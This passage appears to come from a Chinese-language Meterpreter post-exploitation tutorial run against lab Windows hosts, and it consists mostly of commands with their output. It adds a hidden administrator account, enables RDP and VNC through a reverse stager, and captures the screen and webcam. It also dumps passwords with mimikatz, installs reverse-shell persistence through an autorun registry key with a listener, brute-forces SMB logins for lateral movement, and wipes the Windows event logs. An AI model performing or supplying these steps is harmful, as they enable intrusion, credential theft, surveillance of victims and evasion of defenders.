国家/地区代码 000 (系统默认值)
帐户启用 Yes
帐户到期 从不
上次设置密码 2019/10/13 11:11:32
密码到期 2019/11/24 11:11:32
密码可更改 2019/10/13 11:11:32
需要密码 Yes
用户可以更改密码 Yes
允许的工作站 All
登录脚本
用户配置文件
主目录
上次登录 2019/10/13 11:12:03
可允许的登录小时数 All
本地组成员 *Users
全局组成员 *None
命令成功完成。
C:\Windows\system32>
可以看到用户属于Users组,非管理员用户,下面添加到管理员组。
C:\Windows\system32>net localgroup administrators test /add
net localgroup administrators test /add
命令成功完成。
C:\Windows\system32>net user test
net user test
用户名 test
全名
注释
用户的注释
国家/地区代码 000 (系统默认值)
帐户启用 Yes
帐户到期 从不
上次设置密码 2019/10/13 11:11:32
密码到期 2019/11/24 11:11:32
密码可更改 2019/10/13 11:11:32
需要密码 Yes
用户可以更改密码 Yes
允许的工作站 All
登录脚本
用户配置文件
主目录
上次登录 2019/10/13 11:12:03
可允许的登录小时数 All
本地组成员 *Administrators *Users
全局组成员 *None
命令成功完成。
C:\Windows\system32>
可以看到,现在用户test已经同时属于Administrators和Users组了。
##使用用户远程登录
- 开启远程桌面rdp
meterpreter > run post/windows/manage/enable_rdp
[*] Enabling Remote Desktop
[*] RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*] The Terminal Services service is not set to auto, changing it to auto ...
[*] Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20191012054909_default_192.168.8.129_host.windows.cle_038774.txt
meterpreter >
也可以使用如下命令,达到同样的效果:
meterpreter > run getgui -e
[!] Meterpreter scripts are deprecated. Try post/windows/manage/enable_rdp.
[!] Example: run post/windows/manage/enable_rdp OPTION=value [...]
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Enabling Remote Desktop
[*] RDP is already enabled
[*] Setting Terminal Services service startup mode
[*] Terminal Services service is already set to auto
[*] Opening port in local firewall if necessary
[*] For cleanup use command: run multi_console_command -r /root/.msf4/logs/scripts/getgui/clean_up__20191012.5056.rc
meterpreter >
- 登录前检查
远程桌面连接前,先检查下受害用户的空闲时长,因为远程登录会把当前用户踢掉,在登录过程中也会显式提醒:
meterpreter > idletime
User has been idle for: 3 hours 48 mins 26 secs
meterpreter >
- 使用rdesktop连接目标桌面
root@kali:~# rdesktop 192.168.1.8
Autoselected keyboard map en-us
Failed to negotiate protocol, retrying with plain RDP.
WARNING: Remote desktop does not support colour depth 24; falling back to 16
此时弹出GUI界面,输入用户名/密码进行登录 。
账户隐藏
上面新添加的用户可以在目标机器登录界面上看到,因此需要隐藏。
略。
端口转发
下面将远程机器192.168.1.8的3389端口反弹到本地9833端口,然后连接本地9833端口,同样达到远程桌面的效果。
meterpreter > portfwd add -l 9833 -r 192.168.1.8 -p 3389
[*] Local TCP relay created: :9833 <-> 192.168.1.8:3389
meterpreter >
端口转发成功,现在使用rdesktop进行本地连接:
root@kali:~# rdesktop 127.0.0.1:9833
Autoselected keyboard map en-us
Failed to negotiate protocol, retrying with plain RDP.
WARNING: Remote desktop does not support colour depth 24; falling back to 16
root@kali:~#
弹出GUI界面,使用用户名/密码登录成功。
屏幕截图
meterpreter > screenshot
Screenshot saved to: /root/aAKvRlgG.jpeg
meterpreter >
##操作摄像头
-
获取摄像头列表
webcam-list -
从指定的摄像头拍摄照片
webcam_snap -
从指定的摄像头实时视频流
webcam_stream
VNC控制
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > run vnc
[*] Creating a VNC reverse tcp stager: LHOST=192.168.1.6 LPORT=4545
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:\Windows\TEMP\QwdqufeOMpX.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.1.6:4545...
meterpreter > /usr/bin/vncviewer: VNC server closed connection
不知道为什么失败了,经过测试,发现当受害者机器在锁屏界面或者普通用户登录进去的界面时会报这个错。
当管理员用户登录进去时,再运行命令,可以成功,如下:
meterpreter > run vnc
[*] Creating a VNC reverse tcp stager: LHOST=192.168.1.6 LPORT=4545
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:\Windows\TEMP\plKeHIXhzUQQ.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.1.6:4545...
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
meterpreter > No authentication needed
Authentication successful
Desktop name "pc"
VNC server default format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor. Pixel format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding
成功弹出VNC图形界面,看到受害者桌面。
##文件操作
可以在meterpreter中使用cd、ls、cat、rm、mkdir等常规命令。
- 上传文件
meterpreter > upload /root/flag.txt
[*] uploading : /root/flag.txt -> flag.txt
[*] Uploaded 9.00 B of 9.00 B (100.0%): /root/flag.txt -> flag.txt
[*] uploaded : /root/flag.txt -> flag.txt
meterpreter >
使用pwd可以查看当前目录,即文件被传到哪里了。
- 运行文件
meterpreter > execute -i -f cmd.exe
Process 1020 created.
Channel 40 created.
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����
C:\>
比如上传mimikatz程序,然后执行execute -i -f mimikatz.exe ,进入mimikatz的交互界面。
然后执行下列命令获取密码:
privilege::debug
sekurlsa::logonpasswords
execute命令详解:
-f 指定可执行文件
-i 跟进程进行交互
-H 创建一个隐藏进程
-a 传递给命令的参数
-m 从内存中执行
-s 在给定会话中执行进程
-t 使用当前伪造的线程令牌运行进行
- 下载文件
meterpreter > download "c:\Windows\System32\drivers\etc\hosts"
[*] Downloading: c:\Windows\System32\drivers\etc\hosts -> hosts
[*] Downloaded 824.00 B of 824.00 B (100.0%): c:\Windows\System32\drivers\etc\hosts -> hosts
[*] download : c:\Windows\System32\drivers\etc\hosts -> hosts
meterpreter >
##持久化
-
启动项
用msfvenom命令生成一个反弹shell后面,然后放到目标机器下列路径达到开机自启动的效果:
C:\Users\$username$\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup我们只要监听相应的端口就行了。
-
系统服务
meterpreter > run persistence -X -i 5 -p 8888 -r 192.168.1.6
[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/PC_20191013.2138/PC_20191013.2138.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=8888
[*] Persistent agent script is 99669 bytes long
[+] Persistent Script written to C:\Windows\TEMP\OueYyJlRdu.vbs
[*] Executing script C:\Windows\TEMP\OueYyJlRdu.vbs
[+] Agent executed with PID 3776
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\UIfUmCsT
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\UIfUmCsT
meterpreter >
persisrence参数说明:
-X 开机启动,-i 反向连接间隔, -r 连接的主机,-p 连接的端口
每隔5秒反弹到192.168.1.6到8888端口,如下:
root@kali:~# nc -lvnp 8888
listening on [any] 8888 ...
connect to [192.168.1.6] from (UNKNOWN) [192.168.1.8] 49195
目标机器重启后仍然有效。
实际场景中,还是使用metasploit类的工具等待反弹:
msf5 exploit(windows/smb/ms17_010_eternalblue) > use exploit/multi/handler
msf5 exploit(multi/handler) > set lport 8888
lport => 8888
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.1.6:8888
[*] Sending stage (179779 bytes) to 192.168.1.8
[*] Meterpreter session 2 opened (192.168.1.6:8888 -> 192.168.1.8:49267) at 2019-10-13 01:05:56 -0400
meterpreter > getuid
Server username: PC\xman666
meterpreter >
持久化需要考虑杀软等,这里会报警。
横向移动
获取子网信息
meterpreter > run get_local_subnets
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 192.168.1.0/255.255.255.0
meterpreter >
使用metasploit模块查看一下该局域网开启3389的服务器。
use auxiliary/scanner/rdp/rdp_scanner
set rhosts 10.0.15.10-33
run
扫描smb登录
use auxiliary/scanner/smb/smb_login
set RHOSTS 10.0.15.10-33
set SMBUser administrator
set SMBPass 123456a?
run
remotewinenum
有时候,不能直接远程桌面登录另外一台Window机器,这个时候可以使用Enter-PSSession命令,通过PowerShell终端登到远程的Window机器,这个时候,就需要被访问的机器打开5985 或者5986 端口。 默认情况下,Window 2008 Server或者Window 2012 Server会自动默认开启WinRM的服务器,从而暴露5985或者5986端口。
Enter-PSSession -computerName Server-R2
清除痕迹
meterpreter > clearev
[*] Wiping 8202 records from Application...
[*] Wiping 23907 records from System...
[*] Wiping 8154 records from Security...
meterpreter >
